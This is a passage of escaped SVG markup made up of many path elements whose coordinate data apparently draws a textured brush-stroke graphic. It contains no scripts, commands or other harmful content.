d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path 